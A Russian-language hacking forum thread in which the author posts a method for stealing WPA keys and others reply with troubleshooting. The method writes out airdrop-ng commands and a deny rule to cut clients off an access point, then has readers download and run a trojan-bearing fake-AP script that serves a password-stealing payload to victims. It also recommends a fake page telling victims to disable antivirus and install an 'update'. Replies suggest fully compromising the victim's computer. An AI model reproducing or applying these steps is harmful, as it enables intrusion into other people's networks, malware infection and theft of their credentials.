всем привет! Как и обещал выкладываю новую методику добычи WPA ключа. Подчеркиваю, все что буден описанно ниже - теоритический материал и мной на практике не использовался. Тестированием и отладкой данной методики займемся вместе, если есть желание и если она будет работать. Для данного метода потребуется 2 wifi адаптера(естественно с поддеркой в BackTrack) Немного о самой методике. Сначала с помощью утилы airdrop-ng, начинаем флудить эфир, отрезаем клиента от точки и не даем ему к ней коннектится. На втором этапе создаем такую же точку только без шифрования. Если клиент подключается, автоматом засылаем ему сплоит, который вынимает все пароли на точки, в том числе и на ту WPA, которая нам нужна. Для примера возьмем такие параметры: BSSID: 00:18:A5:42:AA:CA Client: 00:00:15:CB:71:85 mon0 - первая карта mon1 - вторая карта Этап 1 - airdrop-ng. Запускаем первую карту мониторить эфир и собирать все в файл. airodump-ng mon0 -w test --output-format csv (test название файла, куда будет писатся весь дамп, csv формат выводимого файла) После чего видим в эфире точку BSSID: 00:18:A5:42:AA:CA(допустим с шифрованием WPA-PSK), и подключенного к ней клиента 00:00:15:CB:71:85. Далее создаем правило для airdrop-ng echo '#Deny rules' > rules && echo 'd/00:18:A5:42:AA:CA|any' >> rules (данное правило запрещает любым устройствам подключатся к точке с указанным маком) Далее запускаем саму программу airdrop-ng cd /pentest/wireless/airdrop-ng/ airdrop-ng -i mon0 -t ~/test-01.csv -r ~/rules Все, клиенты скинулись с точки. Можете легко редактировать правила ограничения доступа к точке с помощью комманды nano rules После чего естественно airdrop-ng надо перезапустить. Все, клиенты отключены, интерфейс mon0 это контролирует, переходим ко второму этапу. 2 этап. Fake AP и вытягивание пароля. качаем архив http://www.mediafire.com/?hakic7kqk8b6e8c (антивирь будет ругаться что внутри трой, далее мы будем его использовать для получуния пароля) архив надо кинуть на рабочий стол BackTrack после чего разархивировать и запустить tar xf fakeAP_pwn-v0.3.tar cd fakeAP_pwn ls mkdir /var/www/fakeAP_pwn cp www/* /var/www/fakeAP_pwn bash fakeAP_pwn.sh -m non -p wkv -v Все, процесс пошел. Когда клиент залогинется вы увидете, если все пройдет успешно, то в окне wifi keys у вас появятся ключики к сетям =) Теперь добавлю немного от себя. Этот метод основан на слове ЕСЛИ! Так что он годится для энтузиастов =) Не забываем что перед запуском fakeAP нам необходимо настроить файл fakeAP_pwn.sh и вбить туда свой интерфейс. естественно надо перевести карту в режим мониторинга на 1 этапе. AirDrop-ng необходимо скачать и установить, если у вас не BackTrack 4 BlackHat R1. Будем шлейфовать данный метод, может до ума доведем. Опять же, желательно отредактировать index.php, перевести на русский язык и написать там, что "Компьютер находится в опасности, обнаружена критическая уязвимость, отключите антивирус и скачайте нижеуказанное обновление". Буду подправлять по возможности. Источники: 1 Этап. Статья - http://adaywithtape.blogspot.com/2010/03/airdrop-ng.html Видео - http://blip.tv/file/3292804/ 2 Этап. Статья - http://www.backtrack-linux.org/forums/backtrack-videos/32462-[script]-[video]-fakeap_pwn-v0-3-a.html Видео - http://g0tmi1k.blip.tv/file/4079518
Странно, при поднятии fakeAP, на атакуемой машине все страницы ссылаются не на созданный файл index.php, а на дефолтную страницу апача, где написано только "It works". Пока не знаю как это исправить, поскольку в этом не селен. Но на BackTrack отображается что я приконнектился и если запросить 10.0.0.1:4564, то сплоит скачивается.
Автор, окстись. Новой методикой тут не пахнет. Если взял чужой скрипт, то, удосужься прочитать как им пользоваться. С сабжем (т.е. скриптом g0tmi1k'а)ты не разобрался, по этой причине у тебя апачем с дефолтным индексом. В архиве лежит фейковая страница на которую ведут пользователя, а также 3 разные начинки. Интересно, как ты описываешь работоспособность скрипта, перевод фейковой страницы, которая у тебя даже не открывается?? Содержимое папки fake_ap закинь в /var/www Вообщем, автор опозорился.
все там раблотает!видео от готмилка есть там все попклярно показано и оно работает как по вайфай так и по сети если чуток подхимичить!ток надо сперва апач чуток пересобрать и дописать!а лучше всего это делать через метасплоит и проблем меньше ....и собстно то если сплоит на компе таргете то нах тот пароль на точку ??ведь можно комп порутать и это намного лучше чем доставать какието пароли на точку! upd:nessus тоже поможет в данной ситуэйшэне чем дропать точку upd:и тем более фекапа есть готовый скрипт на котором не че не надо делать!ток выбрать шото там и усе оно само сделает
народ делал все по видео готмилка, вылезает только окно Apache It works, и самого фейка нету.Обьясните плз подробно что и где нада исправить.
Привет всем, прошу прощение, может не в эту тему пишу, но у меня вопрос: почему когда пытаюсь наловить пакеты точки, ни один пакет не ловится. ждал по-моему целый день, всего один пакет появился. Ловил в помощью проги CommView For Wi-FI Спасибо за ответ.
Созрел вопрос по теме. Просмотрел многократно видео от Готмилка, но так и не въехал - как у винды спросить пасс на ВайФай? Ipconfig такой инфы не дает, netsh тоже, консоль здесь вообще, я так полагаю, бесполезна. А ремоут десктоп - это палево, у чувака мышка сама будет тыркать по ярлыкам - я бы сразу стреманулся